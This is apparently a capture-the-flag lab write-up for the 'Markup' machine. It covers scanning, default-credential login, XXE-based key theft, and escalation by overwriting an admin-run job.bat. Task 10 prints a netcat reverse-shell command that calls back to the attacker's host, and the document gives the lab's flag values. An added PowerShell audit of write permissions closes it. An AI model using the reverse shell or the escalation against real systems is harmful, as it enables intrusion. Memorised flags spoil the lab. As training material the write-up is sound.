# Markup

## Initial Scan

```nmap
sudo nmap -T4 -v 10.129.202.209 -oA Markup-Basic
sudo nmap -T4 -p 22,80,443 -sV -sC -v 10.129.202.209 -oA Markup-sv
```

<figure><img src="/files/SAYUA4S7Ucd7di7rrizZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9GkuI1zwMccbAVvW8UmU" alt=""><figcaption></figcaption></figure>

## Task 1

What version of Apache is running on the target's port 80?

Answer: 2.4.41

## Task 2

What username:password combination logs in successfully?

<figure><img src="/files/vW2MOepjPpcMAJznVspr" alt=""><figcaption></figcaption></figure>

Just tried basic default logins.

<figure><img src="/files/dwt0LLXhubH5S7tnPrp7" alt=""><figcaption></figcaption></figure>

Answer: `admin:password`

## Task 3

What is the word at the top of the page that accepts user input?

<figure><img src="/files/jQWVnSj5hVDIs2otqqPF" alt=""><figcaption></figcaption></figure>

Answer: Order

## Task 4

What XML version is used on the target?

<figure><img src="/files/CFNkrC89zeFHaPxh5EBT" alt=""><figcaption></figcaption></figure>

Answer: 1.0

## Task 5

What does the XXE / XEE attack acronym stand for?

<figure><img src="/files/2x9zP4huhXAGQ3ESR6w3" alt=""><figcaption></figcaption></figure>

Answer: XML external entity

## Task 6

What username can we find on the webpage's HTML code?

<figure><img src="/files/QRTZGRmShIWRPLFEA0nj" alt=""><figcaption></figcaption></figure>

Answer: Daniel

## Task 7

What is the file located in the Log-Management folder on the target?

<figure><img src="/files/ifzFUCRhJlKlt2V7VO09" alt=""><figcaption></figcaption></figure>

Put the RSA key into a file on our machine.

<figure><img src="/files/9kTMiJtrAQ5vJFeYQCQr" alt=""><figcaption></figcaption></figure>

Log in as daniel.

<figure><img src="/files/kP1wFlAJYY4TZJmbqbg5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1z8t3fd9aNax8O4W2jvl" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/EEtBofpy3QEOFfTtF54V" alt=""><figcaption></figcaption></figure>

Answer: job.bat

## Task 8

What executable is mentioned in the file mentioned before?

<figure><img src="/files/u7tdyfI5TkGxEBGLVcc8" alt=""><figcaption></figcaption></figure>

Answer: wevtutil.exe

## Task 9

Submit user flag

<figure><img src="/files/f5CNK314ixrJz7L2RpeW" alt=""><figcaption></figcaption></figure>

Answer: 032d2fc8952a8c24e39c8f0ee9918ef7

## Task 10

Submit root flag

Run winPEAS.

<figure><img src="/files/VbzsxWkCMp6dila6uQ24" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lQ7fjQNbwO3v6vrpEc8d" alt=""><figcaption></figcaption></figure>

Under the section "Searching executable files in non-default folders with write (equivalent) permissions (can be slow)" we see:

<figure><img src="/files/pRwJ3FC65jhImgcf06BF" alt=""><figcaption></figcaption></figure>

This is the file we looked at in the previous questions. Let's run netcat to connect back to us as admin.

<figure><img src="/files/RjU0RS7sYBDw4bvpcR2Q" alt=""><figcaption></figcaption></figure>

Get nc.exe onto the target

<figure><img src="/files/qLEvUhN6WyTSB7kAIkZj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/IaSoZqCYxE6T2CTO9t5n" alt=""><figcaption></figcaption></figure>

Run it to get admin on the system

```
echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat
```

<figure><img src="/files/BnJlLA1a2jR0CybD2UWT" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5iVGDtUOIrXfrHDAdS2l" alt=""><figcaption></figcaption></figure>

I had trouble getting the shell to pop, which apparently is common. The root flag is under `C:\Users\Administrator\Desktop\root.txt`.

Answer: f574a3e7650cebd8c39784299cb570f8
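
From the defender's side, the finding in this task comes down to a low-privileged account being able to write to `C:\Log-Management\job.bat`, a file that ends up executed with administrative rights. The PowerShell below is an added example, not part of the original write-up: it lists allow-ACEs that grant write-type rights on a path to principals outside a trusted set. The function name `Get-RiskyWriteAce` and the trusted list are assumptions to adjust per host.

```powershell
# Added example: report ACEs that let non-trusted principals modify a file or folder.
# Assumption: the $trusted list below matches the host (names differ on localized systems).
function Get-RiskyWriteAce {
    param([Parameter(Mandatory)][string]$Path)

    # Principals expected to be able to change a script that runs with admin rights.
    $trusted = @(
        'NT AUTHORITY\SYSTEM',
        'BUILTIN\Administrators',
        'NT SERVICE\TrustedInstaller'
    )

    # Rights that allow changing content, deleting, or rewriting the ACL/owner,
    # plus the raw GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits,
    # which Get-Acl can return unmapped on inherit-only entries.
    $rights    = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $writeMask = [int]$rights -bor 0x50000000

    if (-not (Test-Path -LiteralPath $Path)) {
        Write-Warning "Not found: $Path"
        return
    }

    (Get-Acl -LiteralPath $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ([int]$_.FileSystemRights -band $writeMask) -ne 0 -and
            $trusted -notcontains $_.IdentityReference.Value
        } |
        Select-Object @{ n = 'Path'; e = { $Path } },
                      IdentityReference, FileSystemRights, IsInherited
}

# Check the script and its folder: write access to the folder is enough
# to replace the file even when the file's own ACL is tight.
'C:\Log-Management\job.bat', 'C:\Log-Management' |
    ForEach-Object { Get-RiskyWriteAce -Path $_ } |
    Format-Table -AutoSize
```

Any row in the output is a principal that can change what the privileged job runs; an empty result means only the trusted set holds write access.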

